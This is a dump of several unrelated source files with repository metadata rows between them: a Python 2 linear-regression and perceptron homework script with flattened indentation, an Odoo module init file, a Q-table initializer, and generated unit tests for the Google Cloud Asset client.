# start weights at all 0
#weights = [0,0,0]
X = array(points)
#print "X"
#print X
XTrans = X.transpose()
#print "X TRANPOSE"
#print XTrans
xTransTimesX = np.dot(XTrans, X)
#xTransTimesX = xTrans * xiiii
#print "XT x X"
#print xTransTimesX
inverse = inv(xTransTimesX)
#print "Inverse"
#print inverse
Y = array(results)
w = dot(dot(inverse, XTrans), Y)
hypSlope = -1 * w[1] / w[2]
hypIntercept = -1 * w[0] / w[2]
s = arange(-1, 1.5, 0.5)
"""
t = arange(-1, 1.5, 0.5)
plt.plot(t, b + slope * t, 'bs-', s, hypIntercept + hypSlope * s, 'gs-', xvalues, yvalues, ':rs')
plt.axis( [-1, 1, -1, 1])
plt.show()
"""
    # see how many misclassified points we have
Ein = dot(X,w)
for i in range(N):
Ein[i] = sign(Ein[i])
#Ein -= Y
#print "Ein"
#print Ein
count = 0.0
for i in range(N):
#squares += (asscalar(i)^2.0)s
#print asscalar(Ein[i]), " ", results[i]
if asscalar(Ein[i]) != results[i]:
count += 1
result = count / N
outCounter = 0.0
outPoints = range(1000)
outExpected = range(1000)
for i in range(1000):
(x,y) = generatePoint()
outPoints[i] = (1,x,y)
yVal = slope * x + b
if (y > yVal):
outExpected[i] = 1
else:
outExpected[i] = -1
OutArray = array(outPoints)
Xa = []
Ya = []
Xb = []
Yb = []
for i in range(1000):
x = outPoints[i][1]
y = outPoints[i][2]
res = outExpected[i]
if res == 1:
Xa.append(x)
Ya.append(y)
else:
Xb.append(x)
Yb.append(y)
#Xa[i] = x
#Ya[i] = y
"""
t = arange(-1, 1.5, 0.5)
plt.plot(t, b + slope * t, 'bs-', s, hypIntercept + hypSlope * s, 'gs-', Xa, Ya, ':rs', Xb, Yb, ":bs")
plt.axis( [-1, 1, -1, 1])
plt.show()
"""
    # Out-of-sample error: fraction of the 1000 fresh points that w misclassifies.
    EOut = dot(OutArray, w)
    for i in range(1000):
        EOut[i] = sign(EOut[i])
        if EOut[i] != outExpected[i]:
            outCounter += 1
    outResult = outCounter / 1000
    return (result, outResult)
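# The triple-quoted block below is the earlier perceptron (PLA) version of this
# experiment; it is a bare string literal, so it never runs and is kept only for
# reference.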
"""
count = 0
converge = 0
#print "LENG: ", len(points)
while True:
# If we have no more misclassified points, we are done
if checkMisclassified(points, weights, results):
break
x = random.randrange(0,N)
point = points[x]
yn = results[x]
#print "YN: " , yn
xn = list(point)
#print xn, type(xn)
#print weights, type(weights)
result = dotProduct(weights, xn)
#print result
#print sign(result)
if (sign(result) != yn):
count += 1
converge = 0
if (yn == 1):
weights[0] += xn[0]
weights[1] += xn[1]
weights[2] += xn[2]
else:
weights[0] -= xn[0]
weights[1] -= xn[1]
weights[2] -= xn[2]
converge += 1
extraPoints = []
for i in range(10000):
(x,y) = generatePoint();
extraPoints.append((1,x,y))
#extraResults = []
miss = 0
for point in extraPoints:
x = point[1]
y = point[2]
yVal = slope * x + b
if (y >= yVal):
answer = 1
#extraResults.append(1)
else:
answer = -1
#extraResults.append(-1)
result = dotProduct(list(point), weights)
if (sign(result) != answer):
miss += 1
#print "MISS: ", miss
return (count, miss)
"""
N = 100
#regression(N)
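# calculateA() ... calculateE() repeat the same validation experiment with nested
# nonlinear feature transforms of (x1, x2): "k = 3" keeps (1, x1, x2, x1^2), and each
# later function adds one more term (x2^2, x1*x2, |x1 - x2|, |x1 + x2|) up to k = 7.
# Each one trains on the first 25 rows of in.dta, evaluates on the remaining rows
# (the value printed as "Ein" is really this validation error), and reports the
# error on out.dta as "Eout".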
def calculateA():
points = []
results = []
validationPoints = []
validationResults = []
inputData = open('in.dta', 'r')
counter = 0
for line in inputData:
#print line
counter += 1
words = line.split()
x1 = float(words[0])
x2 = float(words[1])
if counter <= 25:
points.append((1, x1, x2, x1 * x1))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
results.append(float(words[2]))
else:
validationPoints.append((1, x1, x2, x1 * x1))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
validationResults.append(float(words[2]))
inputData.close()
#print points
#print results
weights = linearRegression(points, results)
print "A: use k = 3"
print "W: ", weights
#print validationPoints
#print validationResults
eIn = calcEin(validationPoints, validationResults, weights)
print "Ein: ", eIn
outPoints = []
outResults = []
outData = open('out.dta', 'r')
for line in outData:
#print line
words = line.split()
x1 = float(words[0])
x2 = float(words[1])
outPoints.append((1, x1, x2, x1 * x1))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
outResults.append(float(words[2]))
outData.close()
eOut = calcEin(outPoints, outResults, weights)
print "Eout: ", eOut
def calculateB():
points = []
results = []
validationPoints = []
validationResults = []
inputData = open('in.dta', 'r')
counter = 0
for line in inputData:
#print line
counter += 1
words = line.split()
x1 = float(words[0])
x2 = float(words[1])
if counter <= 25:
points.append((1, x1, x2, x1 * x1, x2 * x2))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
results.append(float(words[2]))
else:
validationPoints.append((1, x1, x2, x1 * x1, x2 * x2))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
validationResults.append(float(words[2]))
inputData.close()
#print points
#print results
weights = linearRegression(points, results)
print "B: use k = 4"
print "W: ", weights
#print validationPoints
#print validationResults
eIn = calcEin(validationPoints, validationResults, weights)
print "Ein: ", eIn
outPoints = []
outResults = []
outData = open('out.dta', 'r')
for line in outData:
#print line
words = line.split()
x1 = float(words[0])
x2 = float(words[1])
outPoints.append((1, x1, x2, x1 * x1, x2 * x2))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
outResults.append(float(words[2]))
outData.close()
eOut = calcEin(outPoints, outResults, weights)
print "Eout: ", eOut
def calculateC():
points = []
results = []
validationPoints = []
validationResults = []
inputData = open('in.dta', 'r')
counter = 0
for line in inputData:
#print line
counter += 1
words = line.split()
x1 = float(words[0])
x2 = float(words[1])
if counter <= 25:
points.append((1, x1, x2, x1 * x1, x2 * x2, x1 * x2))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
results.append(float(words[2]))
else:
validationPoints.append((1, x1, x2, x1 * x1, x2 * x2, x1 * x2))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
validationResults.append(float(words[2]))
inputData.close()
#print points
#print results
weights = linearRegression(points, results)
print "C: use k = 5"
print "W: ", weights
#print validationPoints
#print validationResults
eIn = calcEin(validationPoints, validationResults, weights)
print "Ein: ", eIn
outPoints = []
outResults = []
outData = open('out.dta', 'r')
for line in outData:
#print line
words = line.split()
x1 = float(words[0])
x2 = float(words[1])
outPoints.append((1, x1, x2, x1 * x1, x2 * x2, x1 * x2))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
outResults.append(float(words[2]))
outData.close()
eOut = calcEin(outPoints, outResults, weights)
print "Eout: ", eOut
def calculateD():
points = []
results = []
validationPoints = []
validationResults = []
inputData = open('in.dta', 'r')
counter = 0
for line in inputData:
#print line
counter += 1
words = line.split()
x1 = float(words[0])
x2 = float(words[1])
if counter <= 25:
points.append((1, x1, x2, x1 * x1, x2 * x2, x1 * x2, abs(x1 - x2)))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
results.append(float(words[2]))
else:
validationPoints.append((1, x1, x2, x1 * x1, x2 * x2, x1 * x2, abs(x1 - x2)))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
validationResults.append(float(words[2]))
inputData.close()
#print points
#print results
weights = linearRegression(points, results)
print "D: use k = 6"
print "W: ", weights
#print validationPoints
#print validationResults
eIn = calcEin(validationPoints, validationResults, weights)
print "Ein: ", eIn
outPoints = []
outResults = []
outData = open('out.dta', 'r')
for line in outData:
#print line
words = line.split()
x1 = float(words[0])
x2 = float(words[1])
outPoints.append((1, x1, x2, x1 * x1, x2 * x2, x1 * x2, abs(x1 - x2)))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
outResults.append(float(words[2]))
outData.close()
eOut = calcEin(outPoints, outResults, weights)
print "Eout: ", eOut
def calculateE():
points = []
results = []
validationPoints = []
validationResults = []
inputData = open('in.dta', 'r')
counter = 0
for line in inputData:
#print line
counter += 1
words = line.split()
x1 = float(words[0])
x2 = float(words[1])
if counter <= 25:
points.append((1, x1, x2, x1 * x1, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
results.append(float(words[2]))
else:
validationPoints.append((1, x1, x2, x1 * x1, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
validationResults.append(float(words[2]))
inputData.close()
print len(points)
print len(results)
print len(validationPoints)
print len(validationResults)
#print points
#print results
weights = linearRegression(points, results)
print "E: use k = 7"
print "W: ", weights
#print validationPoints
#print validationResults
eIn = calcEin(validationPoints, validationResults, weights)
print "Ein: ", eIn
outPoints = []
outResults = []
outData = open('out.dta', 'r')
for line in outData:
#print line
words = line.split()
x1 = float(words[0])
x2 = float(words[1])
outPoints.append((1, x1, x2, x1 * x1, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))#, x2 * x2, x1 * x2, abs(x1 - x2), abs(x1 + x2)))
outResults.append(float(words[2]))
outData.close()
eOut = calcEin(outPoints, outResults, weights)
print "Eout: ", eOut
calculateA()
calculateB()
calculateC()
calculateD()
calculateE()
#print outPoints
#print outResults
"""
results = 0.0
outResults = 0.0
for i in range(1000):
(result, outCounter) = regression(N)
results += result
outResults += outCounter
print "FINAL Ein"
print results / 1000
print "FINAL Eout"
print outResults / 1000
"""
"""
iterations = 0.0
miss = 0.0
for i in range(1000):
numIterations, misses = PLA()
iterations += numIterations
miss += misses
print i
avg = iterations/1000
avgMiss = miss / 1000
print "AVG:", avg
print "AVG MISS: ", avgMiss
""" | [
"="
] | = |
3423017cde1fa95647f30b289fef5e2249c48c80 | 25114b282d36bf67448582fa73eb50ee350c4da7 | /multicolor_backend_theme/__init__.py | aa487b80d227678e989bbb6cdf900a094b116d0e | [] | no_license | inst-sol4u/CybroAddons | 7b888628e1a1bdc21eee3c82f0c975271cc5f238 | 39a50294785209c4964f5925d7129bdc9d4af4e4 | refs/heads/14.0 | 2023-08-18T11:51:45.494958 | 2021-09-24T09:50:43 | 2021-09-24T09:50:43 | 372,519,765 | 0 | 0 | null | 2021-05-31T13:40:19 | 2021-05-31T13:40:19 | null | UTF-8 | Python | false | false | 992 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# Cybrosys Technologies Pvt. Ltd.
#
# Copyright (C) 2020-TODAY Cybrosys Technologies(<https://www.cybrosys.com>).
# Author: Cybrosys Techno Solutions (<https://www.cybrosys.com>)
# you can modify it under the terms of the GNU LESSER
# GENERAL PUBLIC LICENSE (AGPL v3), Version 3.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU LESSER GENERAL PUBLIC LICENSE (AGPL v3) for more details.
#
# You should have received a copy of the GNU LESSER GENERAL PUBLIC LICENSE
# GENERAL PUBLIC LICENSE (AGPL v3) along with this program.
# If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from . import models
from . import controllers
| [
"[email protected]"
] | |
a7ea9d535013853895485bb04c94a3fbfcc123c2 | 7fc03f7d28ea7bbdca650a51a23fc0b13cbefde1 | /reinforcement_learning/0x00-q_learning/1-q_init.py | d42a24aba80da020f4cb8c8a81a025823604dba3 | [] | no_license | HeimerR/holbertonschool-machine_learning | 54c410e40d38635de482773f15e26ce1c2c95e46 | e10b4e9b6f3fa00639e6e9e5b35f0cdb43a339a3 | refs/heads/master | 2021-07-24T09:33:25.833269 | 2021-01-14T00:21:45 | 2021-01-14T00:21:45 | 236,603,791 | 0 | 6 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | #!/usr/bin/env python3
""" Initialize Q-table """
import numpy as np
def q_init(env):
""" initializes the Q-table
- env is the FrozenLakeEnv instance
Returns: the Q-table as a numpy.ndarray of zeros
"""
action_space_size = env.action_space.n
state_space_size = env.observation_space.n
q_table = np.zeros((state_space_size, action_space_size))
return q_table
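# Example usage (hypothetical; assumes OpenAI Gym's FrozenLake environment, whose
# registered id depends on the installed gym version):
#   env = gym.make('FrozenLake-v0')
#   Q = q_init(env)   # ndarray of zeros, shape (n_states, n_actions)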
| [
"[email protected]"
] | |
10778c9059cfa6f612f36c918719dfe2545ca72a | c16ea32a4cddb6b63ad3bacce3c6db0259d2bacd | /google/cloud/asset/v1/asset-v1-py/tests/unit/gapic/asset_v1/test_asset_service.py | deb23fdbb57c40a7e82e84f0631510dfa2f774ef | [
"Apache-2.0"
] | permissive | dizcology/googleapis-gen | 74a72b655fba2565233e5a289cfaea6dc7b91e1a | 478f36572d7bcf1dc66038d0e76b9b3fa2abae63 | refs/heads/master | 2023-06-04T15:51:18.380826 | 2021-06-16T20:42:38 | 2021-06-16T20:42:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152,276 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import packaging.version
import grpc
from grpc.experimental import aio
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import future
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.api_core import operation_async # type: ignore
from google.api_core import operations_v1
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.asset_v1.services.asset_service import AssetServiceAsyncClient
from google.cloud.asset_v1.services.asset_service import AssetServiceClient
from google.cloud.asset_v1.services.asset_service import pagers
from google.cloud.asset_v1.services.asset_service import transports
from google.cloud.asset_v1.services.asset_service.transports.base import _API_CORE_VERSION
from google.cloud.asset_v1.services.asset_service.transports.base import _GOOGLE_AUTH_VERSION
from google.cloud.asset_v1.types import asset_service
from google.cloud.asset_v1.types import assets
from google.longrunning import operations_pb2
from google.oauth2 import service_account
from google.protobuf import duration_pb2 # type: ignore
from google.protobuf import field_mask_pb2 # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
from google.type import expr_pb2 # type: ignore
import google.auth
# TODO(busunkim): Once google-api-core >= 1.26.0 is required:
# - Delete all the api-core and auth "less than" test cases
# - Delete these pytest markers (Make the "greater than or equal to" tests the default).
requires_google_auth_lt_1_25_0 = pytest.mark.skipif(
packaging.version.parse(_GOOGLE_AUTH_VERSION) >= packaging.version.parse("1.25.0"),
reason="This test requires google-auth < 1.25.0",
)
requires_google_auth_gte_1_25_0 = pytest.mark.skipif(
packaging.version.parse(_GOOGLE_AUTH_VERSION) < packaging.version.parse("1.25.0"),
reason="This test requires google-auth >= 1.25.0",
)
requires_api_core_lt_1_26_0 = pytest.mark.skipif(
packaging.version.parse(_API_CORE_VERSION) >= packaging.version.parse("1.26.0"),
reason="This test requires google-api-core < 1.26.0",
)
requires_api_core_gte_1_26_0 = pytest.mark.skipif(
packaging.version.parse(_API_CORE_VERSION) < packaging.version.parse("1.26.0"),
reason="This test requires google-api-core >= 1.26.0",
)
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
return "foo.googleapis.com" if ("localhost" in client.DEFAULT_ENDPOINT) else client.DEFAULT_ENDPOINT
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert AssetServiceClient._get_default_mtls_endpoint(None) is None
assert AssetServiceClient._get_default_mtls_endpoint(api_endpoint) == api_mtls_endpoint
assert AssetServiceClient._get_default_mtls_endpoint(api_mtls_endpoint) == api_mtls_endpoint
assert AssetServiceClient._get_default_mtls_endpoint(sandbox_endpoint) == sandbox_mtls_endpoint
assert AssetServiceClient._get_default_mtls_endpoint(sandbox_mtls_endpoint) == sandbox_mtls_endpoint
assert AssetServiceClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi
@pytest.mark.parametrize("client_class", [
AssetServiceClient,
AssetServiceAsyncClient,
])
def test_asset_service_client_from_service_account_info(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(service_account.Credentials, 'from_service_account_info') as factory:
factory.return_value = creds
info = {"valid": True}
client = client_class.from_service_account_info(info)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == 'cloudasset.googleapis.com:443'
@pytest.mark.parametrize("client_class", [
AssetServiceClient,
AssetServiceAsyncClient,
])
def test_asset_service_client_from_service_account_file(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(service_account.Credentials, 'from_service_account_file') as factory:
factory.return_value = creds
client = client_class.from_service_account_file("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
client = client_class.from_service_account_json("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == 'cloudasset.googleapis.com:443'
def test_asset_service_client_get_transport_class():
transport = AssetServiceClient.get_transport_class()
available_transports = [
transports.AssetServiceGrpcTransport,
]
assert transport in available_transports
transport = AssetServiceClient.get_transport_class("grpc")
assert transport == transports.AssetServiceGrpcTransport
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
(AssetServiceClient, transports.AssetServiceGrpcTransport, "grpc"),
(AssetServiceAsyncClient, transports.AssetServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
@mock.patch.object(AssetServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(AssetServiceClient))
@mock.patch.object(AssetServiceAsyncClient, "DEFAULT_ENDPOINT", modify_default_endpoint(AssetServiceAsyncClient))
def test_asset_service_client_client_options(client_class, transport_class, transport_name):
# Check that if channel is provided we won't create a new one.
with mock.patch.object(AssetServiceClient, 'get_transport_class') as gtc:
transport = transport_class(
credentials=ga_credentials.AnonymousCredentials()
)
client = client_class(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch.object(AssetServiceClient, 'get_transport_class') as gtc:
client = client_class(transport=transport_name)
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_MTLS_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
# unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
with pytest.raises(MutualTLSChannelError):
client = client_class()
# Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}):
with pytest.raises(ValueError):
client = client_class()
# Check the case quota_project_id is provided
options = client_options.ClientOptions(quota_project_id="octopus")
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id="octopus",
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
@pytest.mark.parametrize("client_class,transport_class,transport_name,use_client_cert_env", [
(AssetServiceClient, transports.AssetServiceGrpcTransport, "grpc", "true"),
(AssetServiceAsyncClient, transports.AssetServiceGrpcAsyncIOTransport, "grpc_asyncio", "true"),
(AssetServiceClient, transports.AssetServiceGrpcTransport, "grpc", "false"),
(AssetServiceAsyncClient, transports.AssetServiceGrpcAsyncIOTransport, "grpc_asyncio", "false"),
])
@mock.patch.object(AssetServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(AssetServiceClient))
@mock.patch.object(AssetServiceAsyncClient, "DEFAULT_ENDPOINT", modify_default_endpoint(AssetServiceAsyncClient))
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
def test_asset_service_client_mtls_env_auto(client_class, transport_class, transport_name, use_client_cert_env):
# This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
# mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
# Check the case client_cert_source is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
options = client_options.ClientOptions(client_cert_source=client_cert_source_callback)
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
if use_client_cert_env == "false":
expected_client_cert_source = None
expected_host = client.DEFAULT_ENDPOINT
else:
expected_client_cert_source = client_cert_source_callback
expected_host = client.DEFAULT_MTLS_ENDPOINT
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case ADC client cert is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
with mock.patch.object(transport_class, '__init__') as patched:
with mock.patch('google.auth.transport.mtls.has_default_client_cert_source', return_value=True):
with mock.patch('google.auth.transport.mtls.default_client_cert_source', return_value=client_cert_source_callback):
if use_client_cert_env == "false":
expected_host = client.DEFAULT_ENDPOINT
expected_client_cert_source = None
else:
expected_host = client.DEFAULT_MTLS_ENDPOINT
expected_client_cert_source = client_cert_source_callback
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case client_cert_source and ADC client cert are not provided.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
with mock.patch.object(transport_class, '__init__') as patched:
with mock.patch("google.auth.transport.mtls.has_default_client_cert_source", return_value=False):
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
(AssetServiceClient, transports.AssetServiceGrpcTransport, "grpc"),
(AssetServiceAsyncClient, transports.AssetServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_asset_service_client_client_options_scopes(client_class, transport_class, transport_name):
# Check the case scopes are provided.
options = client_options.ClientOptions(
scopes=["1", "2"],
)
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=["1", "2"],
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
@pytest.mark.parametrize("client_class,transport_class,transport_name", [
(AssetServiceClient, transports.AssetServiceGrpcTransport, "grpc"),
(AssetServiceAsyncClient, transports.AssetServiceGrpcAsyncIOTransport, "grpc_asyncio"),
])
def test_asset_service_client_client_options_credentials_file(client_class, transport_class, transport_name):
# Check the case credentials file is provided.
options = client_options.ClientOptions(
credentials_file="credentials.json"
)
with mock.patch.object(transport_class, '__init__') as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
def test_asset_service_client_client_options_from_dict():
with mock.patch('google.cloud.asset_v1.services.asset_service.transports.AssetServiceGrpcTransport.__init__') as grpc_transport:
grpc_transport.return_value = None
client = AssetServiceClient(
client_options={'api_endpoint': 'squid.clam.whelk'}
)
grpc_transport.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
def test_export_assets(transport: str = 'grpc', request_type=asset_service.ExportAssetsRequest):
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.export_assets),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name='operations/spam')
response = client.export_assets(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.ExportAssetsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_export_assets_from_dict():
test_export_assets(request_type=dict)
def test_export_assets_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport='grpc',
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.export_assets),
'__call__') as call:
client.export_assets()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.ExportAssetsRequest()
@pytest.mark.asyncio
async def test_export_assets_async(transport: str = 'grpc_asyncio', request_type=asset_service.ExportAssetsRequest):
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.export_assets),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name='operations/spam')
)
response = await client.export_assets(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == asset_service.ExportAssetsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_export_assets_async_from_dict():
await test_export_assets_async(request_type=dict)
def test_export_assets_field_headers():
client = AssetServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.ExportAssetsRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.export_assets),
'__call__') as call:
call.return_value = operations_pb2.Operation(name='operations/op')
client.export_assets(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
@pytest.mark.asyncio
async def test_export_assets_field_headers_async():
client = AssetServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = asset_service.ExportAssetsRequest()
request.parent = 'parent/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.export_assets),
'__call__') as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(operations_pb2.Operation(name='operations/op'))
await client.export_assets(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'parent=parent/value',
) in kw['metadata']
